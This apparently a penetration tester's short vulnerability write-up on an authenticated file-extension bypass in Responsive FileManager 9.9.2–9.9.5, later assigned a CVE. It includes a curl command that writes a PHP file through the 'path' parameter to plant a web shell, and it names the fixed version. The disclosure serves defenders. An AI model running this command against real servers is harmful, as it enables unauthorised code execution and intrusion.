File extension bypass in Responsive FileManager ≤9.9.5 leading to RCE (authenticated)

On one of the penetration testing projects, I came across an old version of Responsive FileManager — 9.9.2. All public exploits were for version 9.14 and below, but they do not work on this version, so I had to find a new one. In this short write-up you will learn how to use it.

The vulnerability was tested on versions 9.9.2 and 9.9.5. I did not find any mention of this vulnerability on the web and in the official repository on github.com. All I found was one line about fixing the vulnerability in version 9.9.6, with thanks to securitum.pl in the changelog.

When creating a file, three parameters are passed to RFM: path, path_thumb, and new_content, e.g.

path=1.txt&path_thumb=../thumbs/.txt&name=1.txt&new_content=sometext

You can use curl to create a text file:

When you tried create file with restricted extension like .php you will fail. However RFM checks only name parameter, and not path that is actually file name with path. And you can change it to .php, set appropriate content ang get the shell.

Like this:

There is no need to PoC or functional exploit for this bug, just use curl.

curl -s “http://<HOSTNAME>/filemanager/execute.php?action=create_file” \
-d “path=cmd.php&path_thumb=../thumbs/.txt&name=1.txt&new_content=<URL_ENCODED_CONTENT>” -H “Cookie: PHPSESSID=<VALID_COOKIE>”

To fix this bug, just update RFM to version 9.9.6

That’s all, thanks for reading!

Upd: CVE-2022–46604 assigned